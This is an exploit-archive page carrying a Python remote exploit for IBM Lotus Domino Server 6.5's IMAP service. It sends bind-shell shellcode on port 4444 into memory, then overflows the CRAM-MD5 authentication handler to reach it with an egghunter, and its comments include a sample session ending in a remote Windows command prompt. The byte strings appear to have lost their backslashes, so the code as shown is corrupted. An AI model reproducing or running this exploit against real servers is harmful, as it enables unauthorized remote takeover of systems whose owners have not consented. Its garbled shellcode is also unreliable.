IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Published : 2007-03-31
# Author : muts
# Previous Title : MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)
# Next Title : ActSoft DVD-Tools (dvdtools.ocx) Remote Buffer Overflow Exploit
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0. 
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:LotusDomino>


import sys
import md5
import struct
import base64
import socket

def sendbind(target):
	bindshell ="x90"* 400  # Metasploit bind shell port 4444
	bindshell +="x54x30x30x57x54x30x30x57" 
	bindshell +=("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
	"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
	"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
	"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
	"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
 	"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
	"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
	"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
	"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
	"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
	"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
	"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
	"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
	"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
	"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
	"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
	"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
	"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
	"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
	"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
	"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
	"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
	"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
	"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
	"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
	"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
	"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
	"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
	"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
	"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
	"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
	"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
	"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
	"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
	"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
	"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
	"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
	"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
	"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
	"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
	"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
	"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
	"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
	"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
	"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a")

	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	bind = 'a001 admin ' + bindshell +'rn'
	print "[*] Sending bindshell *somewhere* into memory"
	sock.send(bind)
	response = sock.recv(1024)
	sock.close()

def ExploitLotus(target):
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	print response
	auth = 'a001 authenticate cram-md5rn'
	sock.send(auth)
	response = sock.recv(1024)
	print response
	m = md5.new()
	m.update(response[2:0])
	digest = m.digest()
	payload = "x90" * 12 + "x33xd2x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7" + 'A' * 210

	# 0x774b4c6a CALL [EAX +4]

	payload += "jLKw"
	payload += "x90x90x90x83xE8x52x83xE8x52x83xE8x52xFFxE0"
	login = payload + ' ' + digest
	login = base64.encodestring(login) + 'rn'
	print "[*] Triggering overwrite, ph33r."
	sock.send(login)
	sock.close()
	print "[*] You may need to wait up to 2 minutes"
	print "[*] for egghunter to find da shell."

if __name__=="__main__":
	try:
		target = sys.argv[1]
	except IndexError:
		print '[*] IBM Lotus Domino Server 6.5 Remote Exploit n[*] muts {-at-} offensive-security.comrn'
		print '[*] Usage: %s <imap server>n' % sys.argv[0]
		
		sys.exit(-1)
	
	print '[*] IBM Lotus Domino Server 6.5 Remote Exploit n[*] muts {-at-} offensive-security.comrn'
	sendbind(target)
	sendbind(target)
	sendbind(target)
	sendbind(target)
	ExploitLotus(target)

# www.Syue.com [2007-03-31]